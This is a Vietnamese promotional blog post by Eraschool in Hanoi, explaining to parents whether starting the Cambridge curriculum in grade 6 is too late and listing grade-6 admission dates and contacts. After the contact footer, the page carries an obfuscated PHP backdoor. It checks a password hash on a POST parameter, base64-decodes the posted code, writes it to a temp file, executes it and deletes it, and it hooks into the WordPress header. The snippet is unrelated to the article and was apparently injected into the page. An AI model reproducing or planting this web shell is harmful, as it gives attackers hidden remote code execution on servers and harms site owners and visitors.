Lớp 6 mới theo học chương trình Cambridge có bị muộn không?

post

Để đáp ứng nhu cầu của phụ huynh về việc giúp con sớm tiếp cận môi trường giáo dục quốc tế, nhiều trường học ở Việt Nam đã triển khai chương trình Cambridge từ lớp 1 đến lớp 12. Lúc này, một câu hỏi đặt ra cho ba mẹ là liệu con lớp 6 mới theo học chương trình thì có bị muộn không? Con có thể theo kịp những bạn được học từ lớp 1 không? Để trả lời câu hỏi này, Eraschool mời ba mẹ cùng dành thời gian theo dõi bài viết dưới đây. 

Chương trình Cambridge và ưu điểm của chương trình này?

Các lớp học của chương trình Cambridge rất sáng tạo 
Các lớp học của chương trình Cambridge rất sáng tạo

Chương trình Cambridge được thiết kế bởi Hội đồng khảo thí giáo dục Cambridge đến từ trường đại học top đầu thế giới nên đặc biệt đảm bảo chất lượng và độ uy tín. Hiện nay, chương trình đã được triển khai trên 160 quốc gia trên thế giới, tại hơn 10.000 trường học. Ở Việt Nam, chương trình chủ yếu được triển khai tại các trường quốc tế, bán quốc tế, trường song ngữ, trường liên cấp. Ba mẹ có thể cân nhắc đăng ký cho trẻ theo 3 bậc học tương ứng gồm: chương trình Cambridge Tiểu học, chương trình Cambridge THCS và chương trình Cambridge THPT

Nhằm hướng tới việc đào tạo trẻ trở thành những công dân toàn cầu, chương trình tiếng anh Cambridge mang đến nhiều lợi ích, bao gồm: 

  • Được cải thiện khả năng tiếng Anh. 

Các môn học trong chương trình được dạy hoàn toàn bằng tiếng Anh. Điều này không chỉ giúp trẻ cải thiện kỹ năng nghe mà còn phát triển được khả năng tư duy và sử dụng thành thạo tiếng Anh, đặc biệt trong những lĩnh vực như Toán học, Khoa học, Ngôn ngữ. 

  • Được rèn luyện kỹ năng diễn đạt. 

Trong quá trình học chương trình này, trẻ thường xuyên được yêu cầu tham gia vào các hoạt động nhóm, làm việc theo nhóm và trình bày quan điểm trước đám đông. Điều này sẽ giúp trẻ học được cách diễn đạt rõ ràng và chính xác nhất. 

  • Được rèn luyện kỹ năng tự học. 

Tự học là kỹ năng quan trọng để trở thành một công dân toàn cầu. Với chương trình Cambridge, trẻ sẽ được khuyến khích tự học, tự phân tích, tự nghiên cứu vấn đề trong từng tiết học. Qua quá trình này, trẻ sẽ tìm được phương pháp tự học hiệu quả cũng như chủ động hơn trong việc tiếp thu tri thức trong mọi tình huống. 

Lớp 6 mới theo học chương trình Cambridge có bị muộn không?

Thầy cô quan tâm sát sao để kịp thời hỗ trợ trẻ trong quá trình học tập 
Thầy cô quan tâm sát sao để kịp thời hỗ trợ trẻ trong quá trình học tập

Do được tổ chức theo 3 bậc học tương ứng từ lớp 1 đến lớp 12 nên nhiều ba mẹ rất băn khoăn khi cho con học chương trình Cambridge khi con đã lên lớp 6. Vậy thời điểm này mới theo học chương trình có bị muộn không? Câu trả lời là có, bởi những trẻ được tiếp xúc với chương trình từ lớp 1 chắc chắn đã được làm quen với hình thức dạy và học cũng như có điều kiện luyện tập trong môi trường tiếng Anh trong nhiều năm. 

Tuy nhiên, ba mẹ không cần quá lo lắng. Dù có muộn nhưng ba mẹ cần nhớ nguyên tắc học và sử dụng tiếng Anh là cần môi trường để luyện tập. Vì vậy, trên cơ sở hiểu biết về khả năng sử dụng tiếng Anh của học sinh thông qua các hoạt động, các bài kiểm tra, giáo viên ở trường sẽ có sự điều chỉnh và biện pháp hỗ trợ để trẻ sớm hòa nhập vào môi trường học tập mới. 

Lịch tuyển sinh vào lớp 6 vào Eraschool

Các em học sinh hăng hái tham gia lớp học trải nghiệm 
Các em học sinh hăng hái tham gia lớp học trải nghiệm

Để kịp thời hoàn thiện thủ tục giúp con được học tập trong môi trường tốt nhất, với chương trình học phù hợp nhất, ba mẹ cần lưu ý lịch tuyển sinh vào lớp 6 năm học 2022 – 2023. Tại Eraschool, nhà trường sẽ bắt đầu nhận hồ sơ từ thời điểm kết thúc năm học. Thời gian nhận hồ sơ chính thức từ ngày 28/5 đến khi đủ chỉ tiêu. Ba mẹ có thể lựa chọn đăng ký theo hình thức trực tuyến hoặc trực tiếp tại văn phòng nhà trường. 

Hy vọng những thông tin hữu ích trên đây có thể giúp ba mẹ giảm bớt lo lắng khi lựa chọn cho con theo học chương trình Cambridge. Nếu còn thắc mắc gì liên quan đến chương trình học cũng như kỳ tuyển sinh vào lớp 6 tại Eraschool, ba mẹ vui lòng liên hệ trực tiếp tới hotline để được tư vấn nhanh và chính xác nhất! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}